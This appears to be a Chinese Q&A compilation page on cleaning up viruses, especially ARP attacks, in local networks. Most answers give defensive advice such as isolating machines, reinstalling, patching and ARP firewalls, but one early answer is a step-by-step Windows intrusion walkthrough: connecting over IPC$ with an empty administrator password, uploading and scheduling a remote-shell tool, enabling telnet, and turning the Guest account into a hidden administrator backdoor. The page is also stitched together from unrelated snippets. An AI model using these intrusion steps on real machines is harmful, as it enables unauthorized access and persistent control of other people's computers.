局域网内有电脑有病毒怎么办? 局域网中有大量电脑中了ARP病毒,怎么办?
用139端口入侵这个入侵。
局域网入侵步骤:
1、C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2、 C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes 将对方的Guest用户激活
11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
从装系统吧 这个是万能的 然后在上网之前装好arp防护工具 360之类的
杀毒软件都是对已知的部分病毒做出防护的,很多病毒如果你已经中了,再用杀毒软件也没有用处了。而且一般情况下是先有病毒再有杀毒软件杀。
这就是所谓道高一尺魔高一丈。
而且处理病毒不一定是把他杀掉。
很多病毒感染了你系统的关键文件,如果把把他杀了或删了,或者隔离到另一个文件夹,会导致你的系统崩溃。这就是查出好多病毒,杀不了的原因。
良好的pc使用习惯和防毒意识是最好的防病毒方法。
全格重装是最好的病毒处理方法。
1.扫描杀毒,清除ie缓存,cookies;
2.如果不行,打开局域网内最临近的另一电脑,查看同局域网内的电脑是否出现同样状况;
3.将所有的电脑断开连接,也就是拔掉网线;
4.完全断电,拔掉电源线;
5.用网络监听工具,看一下局域网内哪台主机的ARP包特多。利用ARP协议进行攻击一般会出现 MAC相同的用户,如果手中有MAC表那就可以对照着查找,一台一台处理;
6.如果还不行,可以把所有网络里的电脑都直接从新做GHOST系统一遍就可以;
7.如果是厉害的U盘病毒会继续潜伏在其他非系统磁盘里,重新做系统也没用,需要完全格式化,之后在重装系统。
诀窍
如果是厉害的病毒估计用国产杀毒软件是没办法的,而且通过注册表处理不但工作量巨大,而且效果也不一定好,最后也不会弄。 建议直接重新做系统,GHOST也可以。
手工查找感染ARP病毒的主机过于烦琐,可以使用网络监听工具。
局域网病毒防范方法:
1.增加安全意识;
2.小心邮件;
3.挑选网络版杀毒软件。
提醒
局域网内请不要没装杀毒软件裸奔。
请勿浏览不健康的网站。
局域网病毒传播方式有以下几种:
1.病毒直接从工作站拷贝到服务器中或通过邮件在网内传播;
2.病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器;
3.病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中;
4.如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。
电脑中毒一般都是重装系统来解决,杀毒有时候也不彻底。
当然在重装系统时要格式化一下所有分区,这样可以确保无病毒残留。
系统方面:玉米系统 比较好用,不但稳定,也很流畅。
你好朋友,你最好使用360杀毒软件进行全盘扫描,不行的话就用360系统急救箱!如果还不行,最好重启一直按F8 进入安全模式进行杀毒!
这种问题是最难把控的了。比较繁琐,但也有处理的根本方法:
1、有条件的局域网最好装硬件防火墙以从根本上解决内网传播病毒。
2、局域网每台机器都装杀毒软件并及时升级杀毒。
3、把局域网内的共享文件夹都先取消掉以免病毒交叉感染。
4、机器设置复杂密码以避免弱口令破解类型的电脑病毒。
5、windows系统补丁也是拒绝局域网病毒的方法之一。
我做网络安全多年了,只说干货!
企业,单位,学校,部门等,有些局域网经常中蠕虫病毒。所谓蠕虫,就是U盘插进去就中毒,一感染一大片。
这种病毒,就两种解决方法:
第一种,用360卫视进行杀毒,可以解决不顽固的。
第二种,就是顽固的,所谓顽固就是,杀完毒重启或者重插U盘,又再次中毒。这种就得看你是系统那个文件感染的了,快捷方法就是找到svchost的进程,进行查找到文件位置,手工强制删除,还有就是用特定软件,但是我也不知道你是那种病毒,是exe感染,还是快捷方式,还是1KB病毒,还是什么?
你是否需要了解?
局域网中毒怎么办?
局域网内某台电脑中毒会影响网络吗 楼主你好,根据你的描述很可能是某台电脑中了ARP病毒导致的,解决方法是首先在某一台电脑上安装防护ARP病毒的软件,然后将其他电脑全部打开观察该软件的报警记录,其中将会有是哪台电脑发起的ARP攻击(看到的是IP地址),然后根据IP地址找到对应哪一台家中的电脑,对该...
局域网中病毒后怎么办
6. Snort.conf文件中的每个INCLUDE *.rules文件都必须写上完整的路径。如下例所示: include c:\\snort\\bin\\exploit.rules7. 安装WinPcap.exe;8. 重新启动计算机;B、安装MySQL Database1. 如果在Windows 2000或XP Server或Advanced Server中运行了终端服务,那就必须从控制面板中的添加\/删除中安装MySQL。否则就可以...
一台没有杀毒软件的电脑中毒了,局域网内所有电脑都上不了网怎么办,现在...
第一步,断开那台电脑的网线,把病毒机跟其它机器隔离开!第二步查杀病毒 1、用u盘版杀毒软件查杀 2、安装杀毒软件,从杀软官网上下载离线杀毒升级包,升级杀软,查杀 3、如果病毒不让安全类软件安装,那只有拔下硬盘,将病毒机硬盘挂在其它有杀软,并且升级到最新版的机器上,进行全盘查杀。期间不要...
局域网中的病毒该如何清除啊,救命啊,Help啊!!!
同时,保持电脑系统的最新状态,安装所有必要的安全补丁,也是抵御病毒入侵的重要措施。最后,养成良好的网络使用习惯,如不随意下载不明来源的文件、不点击可疑链接,以及定期备份重要数据,能有效减少病毒侵害的风险。希望以上建议能帮助您有效清除局域网中的病毒,保护您的电脑安全。
局域网病毒怎么处理?临时文件夹的病毒怎么每次开机都会出来?
局域网中的病毒,如果有一台机感染了,就算其他的都杀毒了,也还是一样很可能再感染 杀毒方法:1、本机杀毒之前,先“断网”(可以不用拔网线,而是将“本地连接”禁用),然后再杀毒,这是每台电脑要做的。2、防御,要在本机上装防御软件,比如防火墙,杀毒扫描软件。这样可以保证本机安全。以上是...
局域网内的ARP病毒怎样解决
您好!ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者取得局域网上的数据封包甚至可篡改封包,且可让网络上特定计算机或所有计算机无法正常连接。为了防止ARP的攻击您可以下载专门的ARP防护软件,但我们还是建议您下载腾讯电脑管家,用管家中的ARP防火墙来解决。下载安装电脑管家...
单位局域网中了ARP病毒,共几百台机器,怎么查出,怎么杀掉
您好!通常对待局域网中的ARP病毒处理方法:1.检测确认是否中了ARP病毒。ARP病毒的症状:上网时好时断,访问网上邻居也是如此,拷贝文件无法完成,出现错误;局域网内的ARP包爆增,使用ARP查询的时候会发现不正常的MAC地址,或者是错误的MAC地址对应,还有就是一个MAC地址对应多个IP的情况也会有出现。2....
我的电脑中了局域网arp病毒,请问什么软件可以彻底解决这个问题?急...
可以修改密码。访问路由器,在其中设置IP地址和Mac地址绑定,这样ARP攻击就无效了 建议你还可以开启ARP防火墙 ARP防火墙,简单来说是局域网的防火墙,当你的电脑是属于局域网的电脑时,你用这个ARP防火墙时,可以防止他人用:“网络执法官、网络剪刀手、局域网终结者”之类的软件来攻击你,使你的电脑无法...
怎样清除局域网内病毒!
防范措施:1、立即升级操作系统中的防病毒软件和防火墙,同时打开“实时监控”功能,实时地拦截来自局域网络上的各种ARP病毒变种。2、立即根据自己的操作系统版本下载微软MS06-014( http:\/\/www.microsoft.com\/china\/technet\/security\/bulletin\/ms06-014.mspx)和MS07-017( http:\/\/www.microsoft.com\/...
怎样控制局域网病毒
你好,对于局域网危害最大的还是arp病毒,以及通过网络传播的病毒如网络蠕虫等等。所以,对于你的问题,建议如下:1、如果局域网内有服务器,最好安装企业版或网络版杀毒软件,做到局域网内所有节点集中管理、集中监控 2、局域网内每台计算机操作系统补丁要随时更新,这个可以通过使用腾讯电脑管家的智能漏洞...